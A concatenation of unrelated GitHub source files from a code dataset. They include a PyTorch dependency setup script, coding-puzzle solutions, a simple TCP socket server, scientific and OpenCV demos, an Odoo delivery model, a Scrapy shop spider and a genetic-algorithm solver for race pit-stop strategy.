(3, 5):\n        c.log.fatal(\"Unsupported python version !\")\n        exit(1)\n\n\ndef pyinstaller(args, pip_commands_extend=None):\n    if pip_commands_extend is None:\n        pip_commands_extend = []\n\n    c.log.info('Installing pyinstaller')\n    r = subprocess.run([sys.executable, '-m', 'pip', 'install', 'pyinstaller'] + pip_commands_extend)\n    if r.returncode != 0:\n        c.log.fatal(\"Pyinstaller installation failed\")\n        exit(1)\n    c.log.info('Pyinstaller successfully installed')\n\n\ndef cli_setup(args, pip_commands_extend=None):\n    if pip_commands_extend is None:\n        pip_commands_extend = []\n\n    def torch_version():\n        if args.cpu:\n            if c.get_os() == c.OS.LINUX:\n                return \"https://download.pytorch.org/whl/cpu/torch-1.1.0-cp{0}{1}-cp{0}{1}m-linux_x86_64.whl\".format(\n                    *c.get_python_version())\n            if c.get_os() == c.OS.MAC:\n                return \"torch\"\n            if c.get_os() == c.OS.WIN:\n                return \"https://download.pytorch.org/whl/cpu/torch-1.1.0-cp{0}{1}-cp{0}{1}m-win_amd64.whl\".format(\n                    *c.get_python_version())\n        else:\n            if c.get_os() == c.OS.LINUX:\n                return \"https://download.pytorch.org/whl/cu100/torch-1.1.0-cp{0}{1}-cp{0}{1}m-linux_x86_64.whl\".format(\n                    *c.get_python_version())\n            if c.get_os() == c.OS.MAC:\n                c.log.warning(\n                    \"# MacOS Binaries don't support CUDA, install from source if CUDA is needed. 
\"\n \"This script will install the cpu version.\")\n return \"torch\"\n if c.get_os() == c.OS.WIN:\n return \"https://download.pytorch.org/whl/cu100/torch-1.1.0-cp{0}{1}-cp{0}{1}m-win_amd64.whl\".format(\n *c.get_python_version())\n\n c.log.info('Installing Cli dependencies')\n path = c.create_temporary_copy(\n os.path.join(os.path.dirname(os.path.abspath(__file__)), \"../requirements.txt\"), \"cli-requirements.txt\")\n with fileinput.FileInput(path, inplace=True) as f:\n for l in f:\n print(l.replace(\"torch==1.1.0\", torch_version()), end='')\n r = subprocess.run([sys.executable, '-m', 'pip', 'install', '-r', path] + pip_commands_extend)\n os.remove(path)\n if r.returncode != 0:\n c.log.fatal(\"Cli dependencies installation failed\")\n exit(1)\n c.log.info('Cli dependencies successfully installed')\n\n\ndef run(args):\n ## System & Dependencies Check\n check_dependencies()\n\n if args.debug:\n c.log.setLevel(logging.DEBUG)\n\n ## Cli dependencies\n pip_commands_extend = (['--user'] if args.pip_user else []) + (['--no-cache-dir'] if args.pip_no_cache_dir else [])\n\n ## Pyinstaller\n if not args.no_pyinstaller:\n pyinstaller(pip_commands_extend)\n\n cli_setup(args, pip_commands_extend)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='cli dependencies setup')\n add_arg_parser(parser)\n args = parser.parse_args()\n run(args)\n","repo_name":"thy1506/dreamtime","sub_path":"src/cli/scripts/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9224424948","text":"# 868. Binary Gap\n#\n# Given a positive integer N, find and return the longest distance between two consecutive 1's in the binary representation of N.\n#\n# If there aren't two consecutive 1's, return 0.\n#\n# Example 1:\n#\n# Input: 22\n# Output: 2\n# Explanation:\n# 22 in binary is 0b10110.\n# In the binary representation of 22, there are three ones, and two consecutive pairs of 1's.\n# The first consecutive pair of 1's have distance 2.\n# The second consecutive pair of 1's have distance 1.\n# The answer is the largest of these two distances, which is 2.\n# Example 2:\n#\n# Input: 5\n# Output: 2\n# Explanation:\n# 5 in binary is 0b101.\n# Example 3:\n#\n# Input: 6\n# Output: 1\n# Explanation:\n# 6 in binary is 0b110.\n# Example 4:\n#\n# Input: 8\n# Output: 0\n# Explanation:\n# 8 in binary is 0b1000.\n# There aren't any consecutive pairs of 1's in the binary representation of 8, so we return 0.\n#\n\nclass Solution:\n def binaryGap(self, number: int) -> int:\n binval=bin(number)\n positions=[]\n for i in range(2,len(binval)):\n if binval[i]=='1':\n positions.append(i)\n diff=0\n if len(positions)==1:\n return 0\n else:\n for i in range(len(positions)-1):\n tempdiff=abs(positions[i]-positions[i+1])\n if tempdiff>diff:\n diff=tempdiff\n return diff\n \n","repo_name":"AmitBaanerjee/Data-Structures-Algo-Practise","sub_path":"leetcode problems/868.py","file_name":"868.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17237431825","text":"import socket\n\nPORT = 9090\n\n## automatically gets private ip addy dynamically\n# only works when not using a virtual box\n# host = socket.gethostbyname(socket.gethostname())\nHOST = ''\n\n# specify the type of socket - TCP - Socket for accepting connection\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# passing a tuple of 
host and port \nserver.bind((HOST, PORT))\n\nserver.listen(5) # number of acceptable connections\n\nwhile True:\n # comms socket \n # returns the addy of the client who is connecting and a socket that we can use to talk to client\n communication_socket, address = server.accept()\n print(f\"Connected to {address}\")\n # specify buffer size and decode for accepting - ascii can be use\n message = communication_socket.recv(1024).decode('utf-8')\n print(f\"Message from client is: {message}\")\n communication_socket.send(f\"This is server, I can hear you LAC!\".encode('utf-8'))\n communication_socket.close()\n print(f\"Connection with {address} ended!\")","repo_name":"veronicapichay/Networking-in-Python","sub_path":"python_sockets/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39426437612","text":"# # Finding the unloaded geometry\n#\n\nfrom fenics_plotly import plot\n\nimport pulse\n\n\ngeometry = pulse.HeartGeometry.from_file(pulse.mesh_paths[\"simple_ellipsoid\"])\n# geometry = pulse.geometries.prolate_ellipsoid_geometry(mesh_size_factor=3.0)\nmaterial = pulse.NeoHookean()\n# material = pulse.Guccione()\n\n# Parameter for the cardiac boundary conditions\nbcs_parameters = pulse.MechanicsProblem.default_bcs_parameters()\nbcs_parameters[\"base_spring\"] = 1.0\nbcs_parameters[\"base_bc\"] = \"fix_x\"\n\n# Create the problem\nproblem = pulse.MechanicsProblem(geometry, material, bcs_parameters=bcs_parameters)\n\n# Suppose geometry is loaded with a pressure of 1 kPa\n# and create the unloader\nunloader = pulse.FixedPointUnloader(problem=problem, pressure=3.0)\n\n# Unload the geometry\nunloader.unload()\n\n# Get the unloaded geometry\nunloaded_geometry = unloader.unloaded_geometry\n\nfig = plot(geometry.mesh, opacity=0.0, show=False)\nfig.add_plot(plot(unloaded_geometry.mesh, color=\"red\", show=False))\nfig.show()\n","repo_name":"finsberg/pulse","sub_path":"demo/unloading/demo_fixedpointunloader.py","file_name":"demo_fixedpointunloader.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"23466167178","text":"#https://www.hackerrank.com/challenges/compare-the-triplets\n\nimport sys\n\ndef solve(a0, a1, a2, b0, b1, b2):\n aliceScore = 0\n bobScore = 0\n\n if a0 > b0:\n aliceScore += 1\n elif a0 < b0:\n bobScore += 1\n if a1 > b1:\n aliceScore += 1\n elif a1 < b1:\n bobScore += 1\n if a2 > b2:\n aliceScore += 1\n elif a2 < b2:\n bobScore += 1\n\n return str(aliceScore) + str(bobScore)\n\n\na0, a1, a2 = input().strip().split(' ')\na0, a1, a2 = [int(a0), int(a1), int(a2)]\nb0, b1, b2 = input().strip().split(' ')\nb0, b1, b2 = [int(b0), int(b1), int(b2)]\nresult = solve(a0, a1, a2, b0, b1, b2)\nprint (\" \".join(map(str, result)))","repo_name":"14gollaher/Katas","sub_path":"Katas/Python/CompareTheTriplets.py","file_name":"CompareTheTriplets.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20338983088","text":"\"\"\"Tests relating to initial henry constant.\n\nAll functions in /calculations/initial_henry.py are tested here.\nThe purposes are:\n\n - testing the user-facing API functions (initial_henry_x)\n - testing individual low level functions against known results.\n\nFunctions are tested against pre-calculated values on real isotherms.\nAll pre-calculated data 
for characterisation can be found in the\n/.conftest file together with the other isotherm parameters.\n\"\"\"\n\nimport pytest\nfrom numpy import isclose\n\nimport pygaps.characterisation.initial_henry as ih\nimport pygaps.parsing as pgp\nimport pygaps.utilities.exceptions as pgEx\n\nfrom ..test_utils import mpl_cleanup\nfrom .conftest import DATA\nfrom .conftest import DATA_N77_PATH\n\n\n@pytest.mark.characterisation\nclass TestInitialHenry():\n \"\"\"Test all initial henry methods.\"\"\"\n @pytest.mark.parametrize('sample', [sample for sample in DATA])\n def test_ihenry_slope(self, sample):\n \"\"\"Test initial slope method with several model isotherms.\"\"\"\n sample = DATA[sample]\n # exclude datasets where it is not applicable\n if sample.get('Khi_slope', None):\n\n filepath = DATA_N77_PATH / sample['file']\n isotherm = pgp.isotherm_from_json(filepath)\n\n ihenry_slope = ih.initial_henry_slope(isotherm, max_adjrms=0.01)\n\n err_relative = 0.1 # 10 percent\n err_absolute = 10 #\n\n assert isclose(ihenry_slope, sample['Khi_slope'], err_relative, err_absolute)\n\n def test_ihenry_slope_limits(self):\n \"\"\"Test introducing limits in the initial slope method.\"\"\"\n sample = DATA['SiO2']\n filepath = DATA_N77_PATH / sample['file']\n isotherm = pgp.isotherm_from_json(filepath)\n ih.initial_henry_slope(isotherm, max_adjrms=0.01, p_limits=[0, 0.2])\n ih.initial_henry_slope(isotherm, max_adjrms=0.01, p_limits=[0.2, None])\n ih.initial_henry_slope(isotherm, max_adjrms=0.01, l_limits=[5, None])\n\n with pytest.raises(pgEx.ParameterError):\n ih.initial_henry_slope(isotherm, max_adjrms=0.01, l_limits=[25, None])\n\n @mpl_cleanup\n def test_ihenry_slope_verbose(self):\n \"\"\"Test verbosity.\"\"\"\n sample = DATA['MCM-41']\n filepath = DATA_N77_PATH / sample['file']\n isotherm = pgp.isotherm_from_json(filepath)\n ih.initial_henry_slope(isotherm, verbose=True)\n\n @pytest.mark.parametrize('sample', [sample for sample in DATA])\n def test_ihenry_virial(self, sample):\n \"\"\"Test virial method with several model isotherms.\"\"\"\n sample = DATA[sample]\n # exclude datasets where it is not applicable\n if sample.get('Khi_slope', None):\n\n filepath = DATA_N77_PATH / sample['file']\n isotherm = pgp.isotherm_from_json(filepath)\n\n ihenry_virial = ih.initial_henry_virial(isotherm)\n\n err_relative = 0.1 # 10 percent\n err_absolute = 10 #\n\n assert isclose(ihenry_virial, sample['Khi_virial'], err_relative, err_absolute)\n\n @mpl_cleanup\n def test_ihenry_virial_verbose(self):\n \"\"\"Test verbosity.\"\"\"\n sample = DATA['SiO2']\n filepath = DATA_N77_PATH / sample['file']\n isotherm = pgp.isotherm_from_json(filepath)\n ih.initial_henry_virial(isotherm, verbose=True)\n","repo_name":"pauliacomi/pyGAPS","sub_path":"tests/characterisation/test_initial_henry.py","file_name":"test_initial_henry.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"32"} +{"seq_id":"30578320043","text":"def deleteSpaces(s):\n s_new = s.replace(\" \",\"\",)\n return s_new\n\ndef check(s1,s2):\n if sorted(deleteSpaces(s1).lower()) == sorted(deleteSpaces(s2).lower()):\n print(\"Anagram\")\n else:\n print(\"Not Anagram\")\n\ns1 = input(\"Enter the first word: \")\ns2 = input(\"Enter the second word: 
\")\n\ncheck(s1,s2)\n","repo_name":"TarampikosAndreas/Python-Exercises","sub_path":"Anagram-Checker/anagram4.py","file_name":"anagram4.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10205365818","text":"import codecs\nimport jieba\nimport re\n\nwith codecs.open(\"./dict/stopwords.txt\", encoding='utf-8') as stopword_file:\n    stop_words = stopword_file.read().splitlines()\n\ndef tokenize(sentence):\n    sentence = sentence.lower()\n    # replace whitespace with a single space\n    sentence = re.sub(r\"\\s+\", ' ', sentence)\n    tokens = jieba.lcut(sentence)\n    tokens = [ token for token in tokens if token not in stop_words ]\n    return tokens","repo_name":"kenyipp/chatbot-maker","sub_path":"nlpEngine/src/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"37813104813","text":"import cv2\nimport numpy as np\nfrom scipy import ndimage\nimport os\n\n# https://docs.opencv.org/3.4.1/d7/d4d/tutorial_py_thresholding.html\nth = 127\nmax_val = 255\n# for color do not forget to convert BGR to RGB\n\n\nimport cv2\n\ncameraCapture = cv2.VideoCapture(0)\n\n\nfps = 30\nsize = (int(cameraCapture.get(cv2.CAP_PROP_FRAME_WIDTH)),\n    int(cameraCapture.get(cv2.CAP_PROP_FRAME_HEIGHT)))\n\n\nwhile cameraCapture.isOpened():\n    _, frame = cameraCapture.read()\n    ret, o1 = cv2.threshold(frame, th, max_val, cv2.THRESH_BINARY) # 0 or max_value\n    ret, o2 = cv2.threshold(frame, th, max_val, cv2.THRESH_BINARY_INV)\n    ret, o3 = cv2.threshold(frame, th, max_val, cv2.THRESH_TOZERO) # pixels above the threshold keep their value, the rest become 0\n    ret, o4 = cv2.threshold(frame, th, max_val, cv2.THRESH_TOZERO_INV)\n    ret, o5 = cv2.threshold(frame, th, max_val, cv2.THRESH_TRUNC) # all pixels > threshold => threshold\n\n    cv2.imshow('MyWindow',\tframe)\n    cv2.imshow(\"binary\", o1)\n    cv2.imshow(\"binary_inv\", o2)\n    cv2.imshow(\"tozero\", o3)\n    cv2.imshow(\"tozero_inv\", o4)\n    cv2.imshow(\"trunc\", o5)\n\n    if cv2.waitKey(1) == 27:\n\n        break # esc to quit\n\ncameraCapture.release()\ncv2.destroyAllWindows()","repo_name":"Tenjin0/python-opencv-base","sub_path":"introduction/13_camera_thresholding.py","file_name":"13_camera_thresholding.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"261657075","text":"\n\"\"\"\nPrint every number between 1 and 100 as follows: For every multiple of 3 print \"Three\".\n For every multiple of 5 print \"Five\".\n And for every multiple of both 3 and 5 print \"ThreeFive\"\nreturn : None\n\n\"\"\"\ndef exercise_one():\n    for i in range(1, 101):\n        if i % 3 == 0 and i % 5 == 0:\n            print(\"ThreeFive\")\n        elif i % 3 == 0:\n            print(\"Three\")\n        elif i % 5 == 0:\n            print(\"Five\")\n        else:\n            print(i)\n    return None\n\n\"\"\"\nDetermine whether a positive integer number is colorful or not.\nparam n:(int) a positive number \nreturn :(bool) True if the number is colorful, False otherwise.\n\"\"\"\n\ndef is_colorful(n):\n    # Convert the integer to a string to obtain its digits\n    digits = str(n)\n    # Create an empty set to store the products\n    products = set()\n    # Iterate through the digits and subsets of digits\n    for i in range(len(digits)):\n        for j in range(i, len(digits)):\n            subset = [int(d) for d in digits[i:j+1]]\n            product = 1\n            # Compute the product of the subset\n            for num in subset:\n                product *= num\n            # Check if the product is 
already in the set\n if product in products:\n return False\n products.add(product)\n return True\n\n\"\"\"\n\nTakes a list of strings a returns the sum of the list items that represents an integer (skipping the other items).\nparam lst:(String) a list of strings.\nreturn :(int or Bool) the result of the calculation.\n\n\"\"\"\ndef calculate(lst):\n if type(lst) != list:\n return False\n total = 0\n for item in lst:\n if type(item) != str:\n pass\n else:\n try:\n num = int(item)\n total += num\n except ValueError:\n # item is not digit\n pass\n return total\n\n\n\n\n\"\"\"\nFinds all the anagrams of a word from a list.\nparam word:(String) a word that we searching anagrams for.\nparam word_list:(List(String)) the list of the words that can potentially be anagrams.\nreturn :(List(String)) the list of the anagrams of the word (it can be empty).\n\"\"\"\ndef anagrams(word, word_list):\n result = list()\n for w in word_list:\n if sorted(w) == sorted(word):\n result.append(w)\n return result\n\n\n","repo_name":"yvss2359/PythonExercices","sub_path":"first_part/src.py","file_name":"src.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12927244923","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom odoo import api, fields, models\r\n\r\n\r\nclass DeliveryRound(models.Model):\r\n\r\n _name = \"delivery.round\"\r\n\r\n name = fields.Char(string=\"Name\", required=True, default=\"/\")\r\n deliverer = fields.Many2one('res.users', string=\"Deliverer\")\r\n responsible = fields.Many2one('res.users', string=\"Responsible\")\r\n time_frame_id = fields.Many2one(\r\n 'time.frame',\r\n string='Time frame',\r\n required=True)\r\n delivery_date = fields.Date(related='time_frame_id.delivery_date',\r\n store=True)\r\n lines = fields.One2many('delivery.round.line', 'delivery_round',\r\n string='Delivery line')\r\n state = fields.Selection([('draft', 'Draft'),\r\n ('ready', 'Ready'),\r\n ('done', 'Done')],\r\n string=\"State\", default=\"draft\")\r\n\r\n @api.one\r\n def action_ready(self):\r\n self.write({'state': 'ready'})\r\n\r\n @api.one\r\n def action_done(self):\r\n self.write({'state': 'done'})\r\n\r\n\r\nclass DeliveryRoundLine(models.Model):\r\n\r\n _name = \"delivery.round.line\"\r\n\r\n sequence = fields.Integer(string=\"Sequence\")\r\n delivered = fields.Boolean(string=\"Delivered\")\r\n picking_batch = fields.Many2one('stock.picking.batch',\r\n string=\"Picking batch\")\r\n delivery_round = fields.Many2one('delivery.round', string=\"Delivery round\",\r\n required=True)\r\n raliment_point = fields.Many2one('res.partner',\r\n string=\"R'Aliment point\")\r\n delivery_address = fields.Many2one(\r\n 'res.partner',\r\n string=\"Delivery address\",\r\n domain=[('is_delivery_point', '=', True)])\r\n stock_pickings = fields.One2many(related='picking_batch.picking_ids',\r\n string=\"Stock pickings\")\r\n order_quantity = fields.Integer(string=\"Order quantity\",\r\n compute=\"_compute_order_quantity\",\r\n store=True)\r\n\r\n @api.depends('stock_pickings')\r\n @api.multi\r\n def _compute_order_quantity(self):\r\n for line in self:\r\n line.order_quantity = len(line.stock_pickings)\r\n","repo_name":"coopiteasy/vertical-distribution-circuits","sub_path":"distribution_circuits_logistic/models/delivery_round.py","file_name":"delivery_round.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"20540528737","text":"from 
scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request\nfrom scrapy.utils.response import get_base_url\nfrom scrapy.contrib.loader.processor import Compose\nfrom urlparse import urljoin\nfrom product_spiders.items import Product, ProductLoader\nimport urllib2\nimport re\n\nfrom product_spiders.spiders.lego_cz.legobase import LegoMetadataBaseSpider\n\n\nclass BejbySpider(LegoMetadataBaseSpider):\n name = u'bejby.net'\n allowed_domains = ['www.bejbynet.cz']\n start_urls = [\n u'http://www.bejbynet.cz/lego-4?page=1',\n u'http://www.bejbynet.cz/lego-nahradni-dily?page=1',\n ]\n errors = []\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n\n items = hxs.select('//div[@id=\"products\"]//h2/a/@href').extract()\n for url in items:\n yield Request(urljoin(base_url, url), callback=self.parse_product)\n if items:\n url = urllib2.urlparse.urlparse(base_url)\n new_url = url.scheme + \"://\" + url.netloc + url.path + \"?page=%d\" % (response.meta.get(\"n\", 1) + 1)\n yield Request(new_url, callback=self.parse, meta={\"n\": response.meta.get(\"n\", 1) + 1})\n\n def parse_price(self, price):\n try:\n price, count = re.subn(r'[^0-9 .,]*([0-9 .,]+)\\W*K.*', r'\\1', price.strip())\n except TypeError:\n return False\n if count:\n price = price.replace(\",\", \"\").replace(\" \", \"\")\n try:\n price = float(price)\n except ValueError:\n return False\n else:\n return price\n elif price.isdigit():\n return float(price)\n return False\n\n def get_sku_from_text(self, text):\n try:\n id, count = re.subn(r'[^0-9]*([0-9]{4,6}).*', r'\\1', text)\n except TypeError:\n return \"\"\n if count:\n id = id.strip()\n try:\n int(id)\n except ValueError:\n return \"\"\n else:\n return id\n return False\n\n def parse_product(self, response):\n\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n\n name = hxs.select('//h1[@id=\"title\"]/text()').pop().extract().strip()\n\n category = hxs.select('//ul[@id=\"breadcrumbs\"]/li/a/text()')[-1].extract().strip()\n\n sku = self.get_sku_from_text(name)\n\n pid = hxs.select('//div[@id=\"product-description\"]//input[@name=\"product\"]/@value').extract()[0]\n if not sku:\n sku = pid\n\n price = self.parse_price(\"\".join(hxs.select('//span[contains(@class, \"final-price\")]/span/span[@class=\"price\"]/text()').extract()))\n\n stock = hxs.select('//div[contains(@class, \"product-prices\")]//div[contains(@class, \"availability\")]/div[@class=\"green\"]')\n\n if price:\n loader = ProductLoader(response=response, item=Product())\n loader.add_value('url', urljoin(base_url, response.url))\n loader.add_value('name', name)\n loader.add_xpath('image_url', '//img[@id=\"galeryImg\"]/@src')\n loader.add_value('price', price)\n loader.add_value('category', category)\n loader.add_value('sku', sku)\n loader.add_value('identifier', pid)\n loader.add_value('brand', 'LEGO')\n if int(price) < 2000:\n loader.add_value('shipping_cost', 89)\n if not stock:\n loader.add_value('stock', 0)\n yield self.load_item_with_metadata(loader.load_item())\n else:\n self.errors.append(\"No price set for url: '%s'\" % urljoin(base_url, response.url))\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/lego_cz/bejbynet.py","file_name":"bejbynet.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19010607374","text":"import os\r\nimport 
copy\r\nimport math \r\nimport time\r\nimport logging\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nfrom tqdm import tqdm\r\nfrom random import SystemRandom\r\n\r\nfrom classes.Car import Car\r\nfrom classes.Weather import Weather\r\nfrom classes.Utils import CIRCUIT, Log, ms_to_time, get_basic_logger\r\n\r\nrandom = SystemRandom()\r\nlogger = get_basic_logger('Genetic', logging.INFO)\r\n\r\nTYRE_WEAR_THRESHOLD = 0.3\r\nBEST_TIME = np.inf\r\nSTRATEGY = None\r\n\r\ndef boxplot_insert(data_list:list, population:list):\r\n population = sorted(population, key=lambda x: x['TotalTime'])\r\n\r\n fitnesses = list()\r\n\r\n for strategy in population:\r\n timing = strategy['TotalTime']\r\n if strategy['Valid'] and timing > 0:\r\n fitnesses.append(strategy['TotalTime'])\r\n else:\r\n fitnesses.append(np.nan)\r\n \r\n data_list.append(fitnesses)\r\n return data_list\r\n\r\ndef orderOfMagnitude(number):\r\n order = 0\r\n if number < 1 and number > 0:\r\n while number<1.0:\r\n order-=1\r\n number*=10\r\n elif number > 0:\r\n while number>1.0:\r\n order+=1\r\n number/=10\r\n\r\n return order\r\n\r\ndef overLimit(values, limit):\r\n if not isinstance(values, list):\r\n values = list(values)\r\n for val in values:\r\n if val >= limit:\r\n return True\r\n \r\n return False\r\n\r\ndef changeTyre(tyresWear:dict):\r\n if all([x < TYRE_WEAR_THRESHOLD for x in tyresWear.values()]):\r\n return False\r\n\r\n boundary = random.random()\r\n for wear in tyresWear.values():\r\n if boundary < wear*2:\r\n return True\r\n return False\r\n\r\nclass GeneticSolver:\r\n\r\n def __init__(self, population:int=2, mutation_pr:float=0.75, crossover_pr:float=0.5, iterations:int=1, car:Car=None, circuit:str='', weather:str='', save_path:str='') -> None:\r\n self.circuit = circuit\r\n self.pitStopTime = CIRCUIT[circuit]['PitStopTime']\r\n self.availableTyres:dict = dict()\r\n self.sigma = mutation_pr\r\n self.mu = crossover_pr\r\n self.population = population\r\n self.numLaps = CIRCUIT[circuit]['Laps']\r\n self.iterations = iterations\r\n self.car:Car = car\r\n self.weather = Weather(circuit) if weather == '' else Weather(circuit, weather)\r\n\r\n ### For the log file\r\n self.path = save_path\r\n self.log = Log(save_path, values={'Circuit':circuit, 'Weather': self.weather.filename, 'PitStopTime':self.pitStopTime, 'Mutation': mutation_pr, 'Crossover': crossover_pr, 'Population': population, 'Iterations':iterations})\r\n \r\n self.mu_decay = 0.99\r\n self.sigma_decay = 0.99\r\n \r\n\r\n # Function to run the algorithm\r\n def run(self,bf_time:int=0):\r\n start_timer = time.time()\r\n\r\n fitness_values = dict()\r\n stuck_counter = 0\r\n boxplot_list = list()\r\n prev = {}\r\n\r\n ### Initial population of random bitstring\r\n population = self.initSolver()\r\n\r\n print(f\"\\n-------------------------------------------------------------\\nData for '{self.circuit}':\\n\\nPopulation = {self.population}\\nIterations = {self.iterations}\\nMutation = {self.sigma}\\nCrossover = {self.mu}\\nWeather = {self.weather.filename}\\n-------------------------------------------------------------\\n\")\r\n \r\n ### Enumerate generations\r\n try:\r\n bar = tqdm(range(self.iterations))\r\n for gen in bar:\r\n \r\n ### Checking if there are duplicates, if so, we remove them\r\n to_pop = []\r\n for i in range(0, len(population)-1):\r\n for j in range(i+1, len(population)):\r\n if population[i] == population[j] and j not in to_pop:\r\n to_pop.append(j)\r\n\r\n ### Removing duplicates by sorted indexes would return an error (we are changing length 
of the list) so we remove them in reversed order\r\n to_pop = sorted(to_pop, reverse=True)\r\n for i in to_pop:\r\n population.pop(i)\r\n \r\n ### Gathering the first solution from population at gen^th generation\r\n if gen == 0:\r\n best, best_eval = self.getBest(population)\r\n else:\r\n best, best_eval = self.getBest(population, best)\r\n\r\n ### Storing data for boxplot\r\n boxplot_list = boxplot_insert(boxplot_list, population)\r\n\r\n ### Select parents\r\n selected = self.selection_dynamic_penalty(step=gen+1,population=population,threshold_quantile=2/13, best = best_eval)\r\n \r\n ### Set as parents the selected individuals\r\n parents = copy.deepcopy(selected)\r\n \r\n ### Make a copy of the parents as new children\r\n children = copy.deepcopy(parents)\r\n\r\n ### Crossover and mutation steps\r\n for i in range(0, len(parents)-1, 2): \r\n p1, p2 = copy.deepcopy(parents[i]), copy.deepcopy(parents[i+1])\r\n\r\n for c in self.crossover(p1, p2):\r\n children.append(c)\r\n \r\n for l in self.mutation(parents[i]):\r\n children.append(l)\r\n \r\n for l in self.mutation(parents[i+1]):\r\n children.append(l)\r\n\r\n ### Add random children to the population if the population is not full\r\n for _ in range(self.population-len(children)):\r\n children.append(self.randomChild())\r\n \r\n ### Replace old population\r\n population = copy.deepcopy(children)\r\n\r\n if prev == best_eval:\r\n stuck_counter += 1\r\n else:\r\n ### Check for new best solution\r\n if not math.isinf(best_eval):\r\n fitness_values[gen] = best_eval\r\n stuck_counter = 0\r\n \r\n prev = best_eval\r\n\r\n ### Check if the solution is stucked\r\n if stuck_counter == 0:\r\n threshold_quantile = 0.3\r\n\r\n if stuck_counter >= (self.iterations)//100:\r\n stuck_counter = 0\r\n quarter_pop = self.population//4\r\n population = population[:self.population]\r\n idx = random.randint(1, quarter_pop)\r\n threshold_quantile = round(threshold_quantile - 0.05,2)\r\n for i in range(3*quarter_pop+idx, self.population):\r\n population[i] = self.randomChild()\r\n \r\n if threshold_quantile <= 0.01 or threshold_quantile >= 0.99:\r\n threshold_quantile = round(random.uniform(0.3,0.99),2)\r\n\r\n valid_strategies = round(((sum([1 for x in children if x['Valid'] == True]))/len(children))*100,2)\r\n bar.set_description(f\"Best: {ms_to_time(best_eval)}, Difference: {ms_to_time(best_eval-bf_time)}, Threshold: {threshold_quantile}, Stuck: {stuck_counter}, Valid strategies: {valid_strategies}%\")\r\n bar.refresh()\r\n string = f'[EA] Generation {gen+1} - Bruteforce solution: {ms_to_time(bf_time)} -> best overall: {ms_to_time(best_eval)} - difference: {ms_to_time(best_eval-bf_time)} - valid strategies: {valid_strategies}% | threshold is {threshold_quantile} - Stuck Counter = {stuck_counter}/{(self.iterations)//100}'\r\n self.log.write(string+\"\\n\")\r\n \r\n except KeyboardInterrupt:\r\n pass \r\n\r\n end_timer = time.time() - start_timer\r\n\r\n fit_dict = {'Generation' : list(fitness_values.keys()), 'Fitness' : list(fitness_values.values())}\r\n\r\n strategy_path = os.path.join(self.path, 'Strategy.txt')\r\n \r\n string = f\"Best Strategy fitness: {best_eval}\\nBest Strategy time: {ms_to_time(best_eval)}\\n\\n vs \\n\\nBruteforce fitness: {bf_time}\\nBruteforce time: {ms_to_time(bf_time)}\\n\\n\\n\"\r\n\r\n for lap in range(self.numLaps):\r\n string += f\"Lap {lap+1}: Rain {best['Weather'][lap]}% -> Compound '{best['TyreCompound'][lap]}', TyresAge {best['TyreAge'][lap]}, Wear '{round(best['TyreWear'][lap]['FL']*100,1)}'% | 
'{round(best['TyreWear'][lap]['FR']*100,1)}'% | '{round(best['TyreWear'][lap]['RL']*100,1)}'% | '{round(best['TyreWear'][lap]['RR']*100,1)}'%, Fuel '{round(best['FuelLoad'][lap],2)}' Kg, PitStop '{'Yes' if best['PitStop'][lap] else 'No'}', Time '{ms_to_time(best['LapTime'][lap])}' ms\\n\"\r\n \r\n with open(strategy_path, 'w') as f:\r\n f.write(string)\r\n \r\n string += f\"Time elapsed: {ms_to_time(round(end_timer*1000))}\\n\"\r\n \r\n print(\"\\n\\n\"+string)\r\n self.log.write(\"\\n\\n\"+string)\r\n\r\n boxplot_df = pd.DataFrame(index=range(len(boxplot_list)))\r\n for i in range(max([len(x) for x in boxplot_list])):\r\n for j in range(len(boxplot_list)):\r\n try:\r\n boxplot_df.at[i,j] = boxplot_list[j][i]\r\n except:\r\n pass\r\n\r\n boxplot_df.to_csv(os.path.join(self.path,'Boxplot.csv'))\r\n\r\n return best, best_eval, boxplot_df, fit_dict, end_timer\r\n \r\n\r\n # Function to initialize the population\r\n def initSolver(self,):\r\n strategies = []\r\n for _ in range(self.population):\r\n strategies.append(self.randomChild())\r\n\r\n return strategies\r\n \r\n\r\n # Function to build a random strategy\r\n def randomChild(self):\r\n strategy = {'TyreCompound': [], 